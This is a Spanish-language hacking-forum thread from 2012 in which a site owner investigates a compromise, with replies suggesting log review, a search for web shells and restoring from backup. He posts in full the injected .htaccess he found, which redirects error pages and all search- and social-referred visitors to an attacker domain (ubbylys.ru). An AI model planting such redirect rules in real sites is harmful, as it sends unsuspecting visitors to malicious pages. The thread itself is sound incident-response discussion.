elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Me están atacando y no se ni como ni por donde
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Me están atacando y no se ni como ni por donde  (Leído 8,422 veces)
Zedmix


Desconectado Desconectado

Mensajes: 672


B*A


Ver Perfil
Me están atacando y no se ni como ni por donde
« en: 17 Mayo 2012, 12:13 pm »

Muy buenas, actualmente estoy recibiendo un ataque en mi sitio web, este sitio web proporciona pequeñas páginas webs a pequeñas empresas y autónomos, esta mañana cuando han intentado acceder al sitio web nos hemos encontrado con que no carga la portada, el título de la página no se muestra y en el lugar donde debe de estar todo el contenido nos muestra lo siguiente ubbylys.ru/count28.php al introducir esta url en el navegador accede al sitio web http://178.162.157.189/70470006.html dando un eror 404 Not Found cosa que no comprendo. ¿alguna idea? ya no es una solución sino también el como lo han podido hacer, gracias un saludo.
En línea

Conciencia, Compromiso, Rebeldia y Solidaridad


it3r

Desconectado Desconectado

Mensajes: 101



Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #1 en: 17 Mayo 2012, 16:38 pm »

mm podrías revisar los logs del apache comúnmente en /var/logs/httpd mira si encuentras algo sospechoso como intentos de sql injection o alguna cosa, luego revisa si es que existe algún nuevo usuario creado en el sistema, revisa su historial de comandos (.bash_history), quizás haya sido un ataque automatizado, osea algún bot que se encargue de escanear y automáticamente inyectar malware en las paginas.

de todos modos no olvides que si usas algún CMS o parecido, debes mantenerlo actualizado.

Saludos
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Me están atacando y no se ni como ni por donde
« Respuesta #2 en: 17 Mayo 2012, 17:29 pm »

si os han cambiado la página no es un ataque, es un hackeo xD

Mi consejo es que restaures una copia de seguridad e investigues cómo han podido acceder, tal y como te comentan, mirando los logs y demás.

Aquí tienes un ejemplo de por dónde empezar:
http://foro.elhacker.net/seguridad/hackearon_la_empresa_confirmado-t358070.0.html;msg1738306#msg1738306
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #3 en: 17 Mayo 2012, 19:14 pm »

Fijate tambien si no te han instalado una shell para poder entrar las veces que quieran luego.
En línea

Zedmix


Desconectado Desconectado

Mensajes: 672


B*A


Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #4 en: 18 Mayo 2012, 09:48 am »

Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log.

Código:
sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
En línea

Conciencia, Compromiso, Rebeldia y Solidaridad


it3r

Desconectado Desconectado

Mensajes: 101



Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #5 en: 18 Mayo 2012, 18:12 pm »

Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log.

Código:
sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

Yandex.ru es el buscador mas conocido de rusia según he escuchado, esos logs solo muestran al BOT de yandex.ru indexando tu web.

No se si ya modificaste tu archivo php, si no, podrías ver la ultima fecha de modificación y revisar en el log mas o menos antes de la ultima fecha de modificación.También podrías ver los logs desde la ultima vez que estaba bien tu web.

Puedes ayudarte de los comandos tail y grep un ejemplo:

Las ultimas 1000 lineas del acces_log-01 y que muestre solo las lineas que contengan AND
Código:
tail -1000 /var/log/httpd/access_log-01 | grep AND

El and es un patrón común en las sql injections, tambien podrias buscar patrones sobre RFI.

Saludos
En línea

Zedmix


Desconectado Desconectado

Mensajes: 672


B*A


Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #6 en: 18 Mayo 2012, 18:52 pm »

Muy buenas continuo aquí investigando, como ha dicho el compañero @it3r he comprobado los últimos archivos con modificaciones, y me he encontrado con tres archivos que se han modificado recientemente, que son: index.php, asdf.html y .htaccess ambos están modificados a la misma hora y el mismo día los abriré y os comento en breve.

Gracias
En línea

Conciencia, Compromiso, Rebeldia y Solidaridad


Zedmix


Desconectado Desconectado

Mensajes: 672


B*A


Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #7 en: 19 Mayo 2012, 11:26 am »

Buenas, después de revisar los archivos:
  • asdf.html: es un archivo en jQueryMobile con el cual yo hice prueba hace bastante tiempo y no lo eliminé ahora veo que ha sido moificado a la misma hora y día que cuando comenzó esto y no me permite eliminarlo
  • index.php: no veo ninguna anomalía, pero también ha sido modificado el archivo a la hora y día del acceso
  • .htaccess: aquí viene el asunto, he modificado el nombre de este archivo y parece que se ha solucionado el problema, pero cuando accedo al servidor desde un explorador, es decir abro una web, en la zona inferior izquierda del Chrome me muestra, "esperando a ubbylys.ru" ¿?¿?¿?

También mostraros el contenido del archivo .htaccess

Código:
#d93065#
RewriteEngine On
ErrorDocument 400 ubbylys.ru/count28.php
ErrorDocument 401 ubbylys.ru/count28.php
ErrorDocument 403 ubbylys.ru/count28.php
ErrorDocument 404 ubbylys.ru/count28.php
ErrorDocument 500 ubbylys.ru/count28.php
ErrorDocument 502 ubbylys.ru/count28.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ ubbylys.ru/count28.php [R=301,L]
#/d93065#
En línea

Conciencia, Compromiso, Rebeldia y Solidaridad


it3r

Desconectado Desconectado

Mensajes: 101



Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #8 en: 19 Mayo 2012, 17:36 pm »

no se si estas en un hosting o un server que tu mismo administras pero como te comentaron antes, debes restaurar con una copia de seguridad que tengas, si no la tienes (muy mal hecho xD) y estas en un hosting pregunta si ellos tienen una copia de seguridad de tu web y si estas en un servidor controlado por ti, entonces lee el link que te pasaron antes.

Saludos
En línea

h3ct0r

Desconectado Desconectado

Mensajes: 108


Hail to the king baby!


Ver Perfil
Re: Me están atacando y no se ni como ni por donde
« Respuesta #9 en: 1 Junio 2012, 17:22 pm »

El .htaccess es solo una cara de la moneda, revisa BIEN tus archivos php, puede que hagas include a algun script que no hallas revisado con detalle y tiene alguna referencia a ubbylys.ru. Lo mas probable es que sea algun pedazo de código ofuscado que muestre un javascript maligno así que dales una buena ojeada.

Si no encuentras nada raro en las fuentes, usa tamper data o live http headers para firefox y ve como se hacen los request desde tu pagina, capaz te ayude a ver donde están localizados los script maliciosos.

Offtopic : Últimamente están de moda los crackers rusos y chinos defaceando por ahí :silbar:
En línea

[img[/img]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines